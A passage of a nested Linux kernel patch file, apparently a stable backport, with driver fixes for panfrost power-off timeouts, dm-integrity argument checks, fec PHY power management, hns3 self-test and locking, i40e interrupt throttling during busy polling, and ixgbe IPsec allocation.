+ 	int (*hw_fini)(void *handle);
+ 	void (*late_fini)(void *handle);
++	int (*prepare_suspend)(void *handle);
+ 	int (*suspend)(void *handle);
+ 	int (*resume)(void *handle);
+ 	bool (*is_idle)(void *handle);
+diff --git a/drivers/gpu/drm/panfrost/panfrost_gpu.c b/drivers/gpu/drm/panfrost/panfrost_gpu.c
+index 55d2430485168..40b6314459926 100644
+--- a/drivers/gpu/drm/panfrost/panfrost_gpu.c
++++ b/drivers/gpu/drm/panfrost/panfrost_gpu.c
+@@ -379,19 +379,19 @@ void panfrost_gpu_power_off(struct panfrost_device *pfdev)
+ 
+ 	gpu_write(pfdev, SHADER_PWROFF_LO, pfdev->features.shader_present);
+ 	ret = readl_relaxed_poll_timeout(pfdev->iomem + SHADER_PWRTRANS_LO,
+-					 val, !val, 1, 1000);
++					 val, !val, 1, 2000);
+ 	if (ret)
+ 		dev_err(pfdev->dev, "shader power transition timeout");
+ 
+ 	gpu_write(pfdev, TILER_PWROFF_LO, pfdev->features.tiler_present);
+ 	ret = readl_relaxed_poll_timeout(pfdev->iomem + TILER_PWRTRANS_LO,
+-					 val, !val, 1, 1000);
++					 val, !val, 1, 2000);
+ 	if (ret)
+ 		dev_err(pfdev->dev, "tiler power transition timeout");
+ 
+ 	gpu_write(pfdev, L2_PWROFF_LO, pfdev->features.l2_present);
+ 	ret = readl_poll_timeout(pfdev->iomem + L2_PWRTRANS_LO,
+-				 val, !val, 0, 1000);
++				 val, !val, 0, 2000);
+ 	if (ret)
+ 		dev_err(pfdev->dev, "l2 power transition timeout");
+ }
+diff --git a/drivers/md/dm-integrity.c b/drivers/md/dm-integrity.c
+index 9c9e2b50c63c3..696365f8f3b5f 100644
+--- a/drivers/md/dm-integrity.c
++++ b/drivers/md/dm-integrity.c
+@@ -4167,7 +4167,7 @@ static int dm_integrity_ctr(struct dm_target *ti, unsigned int argc, char **argv
+ 		} else if (sscanf(opt_string, "sectors_per_bit:%llu%c", &llval, &dummy) == 1) {
+ 			log2_sectors_per_bitmap_bit = !llval ? 0 : __ilog2_u64(llval);
+ 		} else if (sscanf(opt_string, "bitmap_flush_interval:%u%c", &val, &dummy) == 1) {
+-			if (val >= (uint64_t)UINT_MAX * 1000 / HZ) {
++			if ((uint64_t)val >= (uint64_t)UINT_MAX * 1000 / HZ) {
+ 				r = -EINVAL;
+ 				ti->error = "Invalid bitmap_flush_interval argument";
+ 				goto bad;
+diff --git a/drivers/net/ethernet/freescale/fec_main.c b/drivers/net/ethernet/freescale/fec_main.c
+index 97d12c7eea772..ebff14b0837d9 100644
+--- a/drivers/net/ethernet/freescale/fec_main.c
++++ b/drivers/net/ethernet/freescale/fec_main.c
+@@ -2236,8 +2236,6 @@ static int fec_enet_mii_probe(struct net_device *ndev)
+ 	fep->link = 0;
+ 	fep->full_duplex = 0;
+ 
+-	phy_dev->mac_managed_pm = 1;
+-
+ 	phy_attached_info(phy_dev);
+ 
+ 	return 0;
+@@ -2249,10 +2247,12 @@ static int fec_enet_mii_init(struct platform_device *pdev)
+ 	struct net_device *ndev = platform_get_drvdata(pdev);
+ 	struct fec_enet_private *fep = netdev_priv(ndev);
+ 	bool suppress_preamble = false;
++	struct phy_device *phydev;
+ 	struct device_node *node;
+ 	int err = -ENXIO;
+ 	u32 mii_speed, holdtime;
+ 	u32 bus_freq;
++	int addr;
+ 
+ 	/*
+ 	 * The i.MX28 dual fec interfaces are not equal.
+@@ -2362,6 +2362,13 @@ static int fec_enet_mii_init(struct platform_device *pdev)
+ 		goto err_out_free_mdiobus;
+ 	of_node_put(node);
+ 
++	/* find all the PHY devices on the bus and set mac_managed_pm to true */
++	for (addr = 0; addr < PHY_MAX_ADDR; addr++) {
++		phydev = mdiobus_get_phy(fep->mii_bus, addr);
++		if (phydev)
++			phydev->mac_managed_pm = true;
++	}
++
+ 	mii_cnt++;
+ 
+ 	/* save fec0 mii_bus */
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_tqp_stats.c b/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_tqp_stats.c
+index f3c9395d8351c..618f66d9586b3 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_tqp_stats.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_tqp_stats.c
+@@ -85,7 +85,7 @@ int hclge_comm_tqps_update_stats(struct hnae3_handle *handle,
+ 		hclge_comm_cmd_setup_basic_desc(&desc, HCLGE_OPC_QUERY_TX_STATS,
+ 						true);
+ 
+-		desc.data[0] = cpu_to_le32(tqp->index & 0x1ff);
++		desc.data[0] = cpu_to_le32(tqp->index);
+ 		ret = hclge_comm_cmd_send(hw, &desc, 1);
+ 		if (ret) {
+ 			dev_err(&hw->cmq.csq.pdev->dev,
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_ethtool.c b/drivers/net/ethernet/hisilicon/hns3/hns3_ethtool.c
+index e22835ae8a941..9fce976a08f01 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_ethtool.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_ethtool.c
+@@ -78,6 +78,9 @@ static const struct hns3_stats hns3_rxq_stats[] = {
+ #define HNS3_NIC_LB_TEST_NO_MEM_ERR	1
+ #define HNS3_NIC_LB_TEST_TX_CNT_ERR	2
+ #define HNS3_NIC_LB_TEST_RX_CNT_ERR	3
++#define HNS3_NIC_LB_TEST_UNEXECUTED	4
++
++static int hns3_get_sset_count(struct net_device *netdev, int stringset);
+ 
+ static int hns3_lp_setup(struct net_device *ndev, enum hnae3_loop loop, bool en)
+ {
+@@ -419,18 +422,26 @@ static void hns3_do_external_lb(struct net_device *ndev,
+ static void hns3_self_test(struct net_device *ndev,
+ 			   struct ethtool_test *eth_test, u64 *data)
+ {
++	int cnt = hns3_get_sset_count(ndev, ETH_SS_TEST);
+ 	struct hns3_nic_priv *priv = netdev_priv(ndev);
+ 	struct hnae3_handle *h = priv->ae_handle;
+ 	int st_param[HNAE3_LOOP_NONE][2];
+ 	bool if_running = netif_running(ndev);
++	int i;
++
++	/* initialize the loopback test result to avoid marking an unexecuted
++	 * loopback test as PASS.
++	 */
++	for (i = 0; i < cnt; i++)
++		data[i] = HNS3_NIC_LB_TEST_UNEXECUTED;
+ 
+ 	if (hns3_nic_resetting(ndev)) {
+ 		netdev_err(ndev, "dev resetting!");
+-		return;
++		goto failure;
+ 	}
+ 
+ 	if (!(eth_test->flags & ETH_TEST_FL_OFFLINE))
+-		return;
++		goto failure;
+ 
+ 	if (netif_msg_ifdown(h))
+ 		netdev_info(ndev, "self test start\n");
+@@ -452,6 +463,10 @@ static void hns3_self_test(struct net_device *ndev,
+ 
+ 	if (netif_msg_ifdown(h))
+ 		netdev_info(ndev, "self test end\n");
++	return;
++
++failure:
++	eth_test->flags |= ETH_TEST_FL_FAILED;
+ }
+ 
+ static void hns3_update_limit_promisc_mode(struct net_device *netdev,
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+index 27037ce795902..9db363fbc34fd 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+@@ -11604,6 +11604,8 @@ static int hclge_init_ae_dev(struct hnae3_ae_dev *ae_dev)
+ 	if (ret)
+ 		goto err_pci_uninit;
+ 
++	devl_lock(hdev->devlink);
++
+ 	/* Firmware command queue initialize */
+ 	ret = hclge_comm_cmd_queue_init(hdev->pdev, &hdev->hw.hw);
+ 	if (ret)
+@@ -11778,6 +11780,7 @@ static int hclge_init_ae_dev(struct hnae3_ae_dev *ae_dev)
+ 
+ 	hclge_task_schedule(hdev, round_jiffies_relative(HZ));
+ 
++	devl_unlock(hdev->devlink);
+ 	return 0;
+ 
+ err_mdiobus_unreg:
+@@ -11790,6 +11793,7 @@ static int hclge_init_ae_dev(struct hnae3_ae_dev *ae_dev)
+ err_cmd_uninit:
+ 	hclge_comm_cmd_uninit(hdev->ae_dev, &hdev->hw.hw);
+ err_devlink_uninit:
++	devl_unlock(hdev->devlink);
+ 	hclge_devlink_uninit(hdev);
+ err_pci_uninit:
+ 	pcim_iounmap(pdev, hdev->hw.hw.io_base);
+diff --git a/drivers/net/ethernet/intel/i40e/i40e.h b/drivers/net/ethernet/intel/i40e/i40e.h
+index 7d4cc4eafd59e..5293fc00938cf 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e.h
++++ b/drivers/net/ethernet/intel/i40e/i40e.h
+@@ -108,7 +108,7 @@
+ #define I40E_MAX_BW_INACTIVE_ACCUM	4 /* accumulate 4 credits max */
+ 
+ /* driver state flags */
+-enum i40e_state_t {
++enum i40e_state {
+ 	__I40E_TESTING,
+ 	__I40E_CONFIG_BUSY,
+ 	__I40E_CONFIG_DONE,
+@@ -156,7 +156,7 @@ enum i40e_state_t {
+ 	BIT_ULL(__I40E_PF_RESET_AND_REBUILD_REQUESTED)
+ 
+ /* VSI state flags */
+-enum i40e_vsi_state_t {
++enum i40e_vsi_state {
+ 	__I40E_VSI_DOWN,
+ 	__I40E_VSI_NEEDS_RESTART,
+ 	__I40E_VSI_SYNCING_FILTERS,
+@@ -992,6 +992,8 @@ struct i40e_q_vector {
+ 	struct rcu_head rcu;	/* to avoid race with update stats on free */
+ 	char name[I40E_INT_NAME_STR_LEN];
+ 	bool arm_wb_state;
++	bool in_busy_poll;
++	int irq_num;		/* IRQ assigned to this q_vector */
+ } ____cacheline_internodealigned_in_smp;
+ 
+ /* lan device */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index d8a7fb21b7b76..a9db1ed74d3fc 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -1249,8 +1249,11 @@ int i40e_count_filters(struct i40e_vsi *vsi)
+ 	int bkt;
+ 	int cnt = 0;
+ 
+-	hash_for_each_safe(vsi->mac_filter_hash, bkt, h, f, hlist)
+-		++cnt;
++	hash_for_each_safe(vsi->mac_filter_hash, bkt, h, f, hlist) {
++		if (f->state == I40E_FILTER_NEW ||
++		    f->state == I40E_FILTER_ACTIVE)
++			++cnt;
++	}
+ 
+ 	return cnt;
+ }
+@@ -3888,6 +3891,12 @@ static void i40e_vsi_configure_msix(struct i40e_vsi *vsi)
+ 		     q_vector->tx.target_itr >> 1);
+ 		q_vector->tx.current_itr = q_vector->tx.target_itr;
+ 
++		/* Set ITR for software interrupts triggered after exiting
++		 * busy-loop polling.
++		 */
++		wr32(hw, I40E_PFINT_ITRN(I40E_SW_ITR, vector - 1),
++		     I40E_ITR_20K);
++
+ 		wr32(hw, I40E_PFINT_RATEN(vector - 1),
+ 		     i40e_intrl_usec_to_reg(vsi->int_rate_limit));
+ 
+@@ -4142,6 +4151,7 @@ static int i40e_vsi_request_irq_msix(struct i40e_vsi *vsi, char *basename)
+ 		}
+ 
+ 		/* register for affinity change notifications */
++		q_vector->irq_num = irq_num;
+ 		q_vector->affinity_notify.notify = i40e_irq_affinity_notify;
+ 		q_vector->affinity_notify.release = i40e_irq_affinity_release;
+ 		irq_set_affinity_notifier(irq_num, &q_vector->affinity_notify);
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_ptp.c b/drivers/net/ethernet/intel/i40e/i40e_ptp.c
+index 97a9efe7b713e..5f2555848a69e 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_ptp.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_ptp.c
+@@ -34,7 +34,7 @@ enum i40e_ptp_pin {
+ 	GPIO_4
+ };
+ 
+-enum i40e_can_set_pins_t {
++enum i40e_can_set_pins {
+ 	CANT_DO_PINS = -1,
+ 	CAN_SET_PINS,
+ 	CAN_DO_PINS
+@@ -192,7 +192,7 @@ static bool i40e_is_ptp_pin_dev(struct i40e_hw *hw)
+  * return CAN_DO_PINS if pins can be manipulated within a NIC or
+  * return CANT_DO_PINS otherwise.
+  **/
+-static enum i40e_can_set_pins_t i40e_can_set_pins(struct i40e_pf *pf)
++static enum i40e_can_set_pins i40e_can_set_pins(struct i40e_pf *pf)
+ {
+ 	if (!i40e_is_ptp_pin_dev(&pf->hw)) {
+ 		dev_warn(&pf->pdev->dev,
+@@ -1081,7 +1081,7 @@ static void i40e_ptp_set_pins_hw(struct i40e_pf *pf)
+ static int i40e_ptp_set_pins(struct i40e_pf *pf,
+ 			     struct i40e_ptp_pins_settings *pins)
+ {
+-	enum i40e_can_set_pins_t pin_caps = i40e_can_set_pins(pf);
++	enum i40e_can_set_pins pin_caps = i40e_can_set_pins(pf);
+ 	int i = 0;
+ 
+ 	if (pin_caps == CANT_DO_PINS)
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_register.h b/drivers/net/ethernet/intel/i40e/i40e_register.h
+index 7339003aa17cd..694cb3e45c1ec 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_register.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_register.h
+@@ -328,8 +328,11 @@
+ #define I40E_PFINT_DYN_CTLN_ITR_INDX_SHIFT 3
+ #define I40E_PFINT_DYN_CTLN_ITR_INDX_MASK I40E_MASK(0x3, I40E_PFINT_DYN_CTLN_ITR_INDX_SHIFT)
+ #define I40E_PFINT_DYN_CTLN_INTERVAL_SHIFT 5
++#define I40E_PFINT_DYN_CTLN_INTERVAL_MASK I40E_MASK(0xFFF, I40E_PFINT_DYN_CTLN_INTERVAL_SHIFT)
+ #define I40E_PFINT_DYN_CTLN_SW_ITR_INDX_ENA_SHIFT 24
+ #define I40E_PFINT_DYN_CTLN_SW_ITR_INDX_ENA_MASK I40E_MASK(0x1, I40E_PFINT_DYN_CTLN_SW_ITR_INDX_ENA_SHIFT)
++#define I40E_PFINT_DYN_CTLN_SW_ITR_INDX_SHIFT 25
++#define I40E_PFINT_DYN_CTLN_SW_ITR_INDX_MASK I40E_MASK(0x3, I40E_PFINT_DYN_CTLN_SW_ITR_INDX_SHIFT)
+ #define I40E_PFINT_ICR0 0x00038780 /* Reset: CORER */
+ #define I40E_PFINT_ICR0_INTEVENT_SHIFT 0
+ #define I40E_PFINT_ICR0_INTEVENT_MASK I40E_MASK(0x1, I40E_PFINT_ICR0_INTEVENT_SHIFT)
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.c b/drivers/net/ethernet/intel/i40e/i40e_txrx.c
+index 94cf82668efaa..3d83fccf742b1 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_txrx.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.c
+@@ -2571,7 +2571,22 @@ static int i40e_clean_rx_irq(struct i40e_ring *rx_ring, int budget)
+ 	return failure ? budget : (int)total_rx_packets;
+ }
+ 
+-static inline u32 i40e_buildreg_itr(const int type, u16 itr)
++/**
++ * i40e_buildreg_itr - build a value for writing to I40E_PFINT_DYN_CTLN register
++ * @itr_idx: interrupt throttling index
++ * @interval: interrupt throttling interval value in usecs
++ * @force_swint: force software interrupt
++ *
++ * The function builds a value for the I40E_PFINT_DYN_CTLN register that
++ * updates the interrupt throttling interval for the specified ITR index
++ * and optionally enforces a software interrupt. If @itr_idx is equal
++ * to I40E_ITR_NONE, no interval change is applied and only the @force_swint
++ * parameter is taken into account. If neither an interval change nor an
++ * enforced software interrupt is requested, the built value just enables
++ * the appropriate vector interrupt.
++ **/
++static u32 i40e_buildreg_itr(enum i40e_dyn_idx itr_idx, u16 interval,
++			     bool force_swint)
+ {
+ 	u32 val;
+ 
+@@ -2585,23 +2600,33 @@ static inline u32 i40e_buildreg_itr(const int type, u16 itr)
+ 	 * an event in the PBA anyway so we need to rely on the automask
+ 	 * to hold pending events for us until the interrupt is re-enabled
+ 	 *
+-	 * The itr value is reported in microseconds, and the register
+-	 * value is recorded in 2 microsecond units. For this reason we
+-	 * only need to shift by the interval shift - 1 instead of the
+-	 * full value.
++	 * We have to shift the given value as it is reported in microseconds
++	 * and the register value is recorded in 2 microsecond units.
+ 	 */
+-	itr &= I40E_ITR_MASK;
++	interval >>= 1;
+ 
++	/* 1. Enable vector interrupt
++	 * 2. Update the interval for the specified ITR index
++	 *    (I40E_ITR_NONE in the register is used to indicate that
++	 *     no interval update is requested)
++	 */
+ 	val = I40E_PFINT_DYN_CTLN_INTENA_MASK |
+-	      (type << I40E_PFINT_DYN_CTLN_ITR_INDX_SHIFT) |
+-	      (itr << (I40E_PFINT_DYN_CTLN_INTERVAL_SHIFT - 1));
++	      FIELD_PREP(I40E_PFINT_DYN_CTLN_ITR_INDX_MASK, itr_idx) |
++	      FIELD_PREP(I40E_PFINT_DYN_CTLN_INTERVAL_MASK, interval);
++
++	/* 3. Enforce software interrupt trigger if requested
++	 *    (the rate of these software interrupts is limited by ITR2,
++	 *     which is set to 20K interrupts per second)
++	 */
++	if (force_swint)
++		val |= I40E_PFINT_DYN_CTLN_SWINT_TRIG_MASK |
++		       I40E_PFINT_DYN_CTLN_SW_ITR_INDX_ENA_MASK |
++		       FIELD_PREP(I40E_PFINT_DYN_CTLN_SW_ITR_INDX_MASK,
++				  I40E_SW_ITR);
+ 
+ 	return val;
+ }
+ 
+-/* a small macro to shorten up some long lines */
+-#define INTREG I40E_PFINT_DYN_CTLN
+-
+ /* The act of updating the ITR will cause it to immediately trigger. In order
+  * to prevent this from throwing off adaptive update statistics we defer the
+  * update so that it can only happen so often. So after either Tx or Rx are
+@@ -2620,8 +2645,10 @@ static inline u32 i40e_buildreg_itr(const int type, u16 itr)
+ static inline void i40e_update_enable_itr(struct i40e_vsi *vsi,
+ 					  struct i40e_q_vector *q_vector)
+ {
++	enum i40e_dyn_idx itr_idx = I40E_ITR_NONE;
+ 	struct i40e_hw *hw = &vsi->back->hw;
+-	u32 intval;
++	u16 interval = 0;
++	u32 itr_val;
+ 
+ 	/* If we don't have MSIX, then we only need to re-enable icr0 */
+ 	if (!(vsi->back->flags & I40E_FLAG_MSIX_ENABLED)) {
+@@ -2643,8 +2670,8 @@ static inline void i40e_update_enable_itr(struct i40e_vsi *vsi,
+ 	 */
+ 	if (q_vector->rx.target_itr < q_vector->rx.current_itr) {
+ 		/* Rx ITR needs to be reduced, this is highest priority */
+-		intval = i40e_buildreg_itr(I40E_RX_ITR,
+-					   q_vector->rx.target_itr);
++		itr_idx = I40E_RX_ITR;
++		interval = q_vector->rx.target_itr;
+ 		q_vector->rx.current_itr = q_vector->rx.target_itr;
+ 		q_vector->itr_countdown = ITR_COUNTDOWN_START;
+ 	} else if ((q_vector->tx.target_itr < q_vector->tx.current_itr) ||
+@@ -2653,25 +2680,36 @@ static inline void i40e_update_enable_itr(struct i40e_vsi *vsi,
+ 		/* Tx ITR needs to be reduced, this is second priority
+ 		 * Tx ITR needs to be increased more than Rx, fourth priority
+ 		 */
+-		intval = i40e_buildreg_itr(I40E_TX_ITR,
+-					   q_vector->tx.target_itr);
++		itr_idx = I40E_TX_ITR;
++		interval = q_vector->tx.target_itr;
+ 		q_vector->tx.current_itr = q_vector->tx.target_itr;
+ 		q_vector->itr_countdown = ITR_COUNTDOWN_START;
+ 	} else if (q_vector->rx.current_itr != q_vector->rx.target_itr) {
+ 		/* Rx ITR needs to be increased, third priority */
+-		intval = i40e_buildreg_itr(I40E_RX_ITR,
+-					   q_vector->rx.target_itr);
++		itr_idx = I40E_RX_ITR;
++		interval = q_vector->rx.target_itr;
+ 		q_vector->rx.current_itr = q_vector->rx.target_itr;
+ 		q_vector->itr_countdown = ITR_COUNTDOWN_START;
+ 	} else {
+ 		/* No ITR update, lowest priority */
+-		intval = i40e_buildreg_itr(I40E_ITR_NONE, 0);
+ 		if (q_vector->itr_countdown)
+ 			q_vector->itr_countdown--;
+ 	}
+ 
+-	if (!test_bit(__I40E_VSI_DOWN, vsi->state))
+-		wr32(hw, INTREG(q_vector->reg_idx), intval);
++	/* Do not update interrupt control register if VSI is down */
++	if (test_bit(__I40E_VSI_DOWN, vsi->state))
++		return;
++
++	/* Update ITR interval if necessary and enforce software interrupt
++	 * if we are exiting busy poll.
++	 */
++	if (q_vector->in_busy_poll) {
++		itr_val = i40e_buildreg_itr(itr_idx, interval, true);
++		q_vector->in_busy_poll = false;
++	} else {
++		itr_val = i40e_buildreg_itr(itr_idx, interval, false);
++	}
++	wr32(hw, I40E_PFINT_DYN_CTLN(q_vector->reg_idx), itr_val);
+ }
+ 
+ /**
+@@ -2778,6 +2816,8 @@ int i40e_napi_poll(struct napi_struct *napi, int budget)
+ 	 */
+ 	if (likely(napi_complete_done(napi, work_done)))
+ 		i40e_update_enable_itr(vsi, q_vector);
++	else
++		q_vector->in_busy_poll = true;
+ 
+ 	return min(work_done, budget - 1);
+ }
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.h b/drivers/net/ethernet/intel/i40e/i40e_txrx.h
+index 768290dc6f48b..6e567d343e031 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_txrx.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.h
+@@ -57,7 +57,7 @@ static inline u16 i40e_intrl_usec_to_reg(int intrl)
+  * mentioning ITR_INDX, ITR_NONE cannot be used as an index 'n' into any
+  * register but instead is a special value meaning "don't update" ITR0/1/2.
+  */
+-enum i40e_dyn_idx_t {
++enum i40e_dyn_idx {
+ 	I40E_IDX_ITR0 = 0,
+ 	I40E_IDX_ITR1 = 1,
+ 	I40E_IDX_ITR2 = 2,
+@@ -67,6 +67,7 @@ enum i40e_dyn_idx_t {
+ /* these are indexes into ITRN registers */
+ #define I40E_RX_ITR    I40E_IDX_ITR0
+ #define I40E_TX_ITR    I40E_IDX_ITR1
++#define I40E_SW_ITR    I40E_IDX_ITR2
+ 
+ /* Supported RSS offloads */
+ #define I40E_DEFAULT_RSS_HENA ( \
+@@ -304,7 +305,7 @@ struct i40e_rx_queue_stats {
+ 	u64 page_busy_count;
+ };
+ 
+-enum i40e_ring_state_t {
++enum i40e_ring_state {
+ 	__I40E_TX_FDIR_INIT_DONE,
+ 	__I40E_TX_XPS_INIT_DONE,
+ 	__I40E_RING_STATE_NBITS /* must be last */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+index ed4be80fec2a5..a5f0c95cba8b5 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+@@ -1626,8 +1626,8 @@ bool i40e_reset_all_vfs(struct i40e_pf *pf, bool flr)
+ {
+ 	struct i40e_hw *hw = &pf->hw;
+ 	struct i40e_vf *vf;
+-	int i, v;
+ 	u32 reg;
++	int i;
+ 
+ 	/* If we don't have any VFs, then there is nothing to reset */
+ 	if (!pf->num_alloc_vfs)
+@@ -1638,11 +1638,10 @@ bool i40e_reset_all_vfs(struct i40e_pf *pf, bool flr)
+ 		return false;
+ 
+ 	/* Begin reset on all VFs at once */
+-	for (v = 0; v < pf->num_alloc_vfs; v++) {
+-		vf = &pf->vf[v];
++	for (vf = &pf->vf[0]; vf < &pf->vf[pf->num_alloc_vfs]; ++vf) {
+ 		/* If VF is being reset no need to trigger reset again */
+ 		if (!test_bit(I40E_VF_STATE_RESETTING, &vf->vf_states))
+-			i40e_trigger_vf_reset(&pf->vf[v], flr);
++			i40e_trigger_vf_reset(vf, flr);
+ 	}
+ 
+ 	/* HW requires some time to make sure it can flush the FIFO for a VF
+@@ -1651,14 +1650,13 @@ bool i40e_reset_all_vfs(struct i40e_pf *pf, bool flr)
+ 	 * the VFs using a simple iterator that increments once that VF has
+ 	 * finished resetting.
+ 	 */
+-	for (i = 0, v = 0; i < 10 && v < pf->num_alloc_vfs; i++) {
++	for (i = 0, vf = &pf->vf[0]; i < 10 && vf < &pf->vf[pf->num_alloc_vfs]; ++i) {
+ 		usleep_range(10000, 20000);
+ 
+ 		/* Check each VF in sequence, beginning with the VF to fail
+ 		 * the previous check.
+ 		 */
+-		while (v < pf->num_alloc_vfs) {
+-			vf = &pf->vf[v];
++		while (vf < &pf->vf[pf->num_alloc_vfs]) {
+ 			if (!test_bit(I40E_VF_STATE_RESETTING, &vf->vf_states)) {
+ 				reg = rd32(hw, I40E_VPGEN_VFRSTAT(vf->vf_id));
+ 				if (!(reg & I40E_VPGEN_VFRSTAT_VFRD_MASK))
+@@ -1668,7 +1666,7 @@ bool i40e_reset_all_vfs(struct i40e_pf *pf, bool flr)
+ 			/* If the current VF has finished resetting, move on
+ 			 * to the next VF in sequence.
+ 			 */
+-			v++;
++			++vf;
+ 		}
+ 	}
+ 
+@@ -1678,39 +1676,39 @@ bool i40e_reset_all_vfs(struct i40e_pf *pf, bool flr)
+ 	/* Display a warning if at least one VF didn't manage to reset in
+ 	 * time, but continue on with the operation.
+ 	 */
+-	if (v < pf->num_alloc_vfs)
++	if (vf < &pf->vf[pf->num_alloc_vfs])
+ 		dev_err(&pf->pdev->dev, "VF reset check timeout on VF %d\n",
+-			pf->vf[v].vf_id);
++			vf->vf_id);
+ 	usleep_range(10000, 20000);
+ 
+ 	/* Begin disabling all the rings associated with VFs, but do not wait
+ 	 * between each VF.
+ 	 */
+-	for (v = 0; v < pf->num_alloc_vfs; v++) {
++	for (vf = &pf->vf[0]; vf < &pf->vf[pf->num_alloc_vfs]; ++vf) {
+ 		/* On initial reset, we don't have any queues to disable */
+-		if (pf->vf[v].lan_vsi_idx == 0)
++		if (vf->lan_vsi_idx == 0)
+ 			continue;
+ 
+ 		/* If VF is reset in another thread just continue */
+ 		if (test_bit(I40E_VF_STATE_RESETTING, &vf->vf_states))
+ 			continue;
+ 
+-		i40e_vsi_stop_rings_no_wait(pf->vsi[pf->vf[v].lan_vsi_idx]);
++		i40e_vsi_stop_rings_no_wait(pf->vsi[vf->lan_vsi_idx]);
+ 	}
+ 
+ 	/* Now that we've notified HW to disable all of the VF rings, wait
+ 	 * until they finish.
+ 	 */
+-	for (v = 0; v < pf->num_alloc_vfs; v++) {
++	for (vf = &pf->vf[0]; vf < &pf->vf[pf->num_alloc_vfs]; ++vf) {
+ 		/* On initial reset, we don't have any queues to disable */
+-		if (pf->vf[v].lan_vsi_idx == 0)
++		if (vf->lan_vsi_idx == 0)
+ 			continue;
+ 
+ 		/* If VF is reset in another thread just continue */
+ 		if (test_bit(I40E_VF_STATE_RESETTING, &vf->vf_states))
+ 			continue;
+ 
+-		i40e_vsi_wait_queues_disabled(pf->vsi[pf->vf[v].lan_vsi_idx]);
++		i40e_vsi_wait_queues_disabled(pf->vsi[vf->lan_vsi_idx]);
+ 	}
+ 
+ 	/* Hw may need up to 50ms to finish disabling the RX queues. We
+@@ -1719,12 +1717,12 @@ bool i40e_reset_all_vfs(struct i40e_pf *pf, bool flr)
+ 	mdelay(50);
+ 
+ 	/* Finish the reset on each VF */
+-	for (v = 0; v < pf->num_alloc_vfs; v++) {
++	for (vf = &pf->vf[0]; vf < &pf->vf[pf->num_alloc_vfs]; ++vf) {
+ 		/* If VF is reset in another thread just continue */
+ 		if (test_bit(I40E_VF_STATE_RESETTING, &vf->vf_states))
+ 			continue;
+ 
+-		i40e_cleanup_reset_vf(&pf->vf[v]);
++		i40e_cleanup_reset_vf(vf);
+ 	}
+ 
+ 	i40e_flush(hw);
+@@ -3078,11 +3076,12 @@ static int i40e_vc_del_mac_addr_msg(struct i40e_vf *vf, u8 *msg)
+ 		/* Allow to delete VF primary MAC only if it was not set
+ 		 * administratively by PF or if VF is trusted.
+ 		 */
+-		if (ether_addr_equal(addr, vf->default_lan_addr.addr) &&
+-		    i40e_can_vf_change_mac(vf))
+-			was_unimac_deleted = true;
+-		else
+-			continue;
++		if (ether_addr_equal(addr, vf->default_lan_addr.addr)) {
++			if (i40e_can_vf_change_mac(vf))
++				was_unimac_deleted = true;
++			else
++				continue;
++		}
+ 
+ 		if (i40e_del_mac_filter(vsi, al->list[i].addr)) {
+ 			ret = I40E_ERR_INVALID_MAC_ADDR;
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_ipsec.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_ipsec.c
+index 774de63dd93a6..15fc2acffb871 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_ipsec.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_ipsec.c
+@@ -908,7 +908,13 @@ int ixgbe_ipsec_vf_add_sa(struct ixgbe_adapter *adapter, u32 *msgbuf, u32 vf)
+ 		goto err_out;
+ 	}
+ 
+-	xs = kzalloc(sizeof(*xs), GFP_KERNEL);
++	algo = xfrm_aead_get_byname(aes_gcm_name, IXGBE_IPSEC_AUTH_BITS, 1);
++	if (unlikely(!algo)) {
++		err = -ENOENT;
++		goto err_out;
++	}
++
++	xs = kzalloc(sizeof(*xs), GFP_ATOMIC);
+ 	if (unlikely(!xs)) {
+ 		err = -ENOMEM;
+ 		goto err_out;
+@@ -924,14 +930,8 @@ int ixgbe_ipsec_vf_add_sa(struct ixgbe_adapter *adapter, u32 *msgbuf, u32 vf)
+ 		memcpy(&xs->id.daddr.a4, sam->addr, sizeof(xs->id.daddr.a4));
+ 	xs->xso.dev = adapter->netdev;
+ 
+-	algo = xfrm_aead_get_byname(aes_gcm_name, IXGBE_IPSEC_AUTH_BITS, 1);
+-	if (unlikely(!algo)) {
+-		err = -ENOENT;
+-		goto err_xs;
+-	}
+-
+ 	aead_len = sizeof(*xs->aead) + IXGBE_IPSEC_KEY_BITS / 8;
+-	xs->aead = kzalloc(aead_len, GFP_KERNEL);
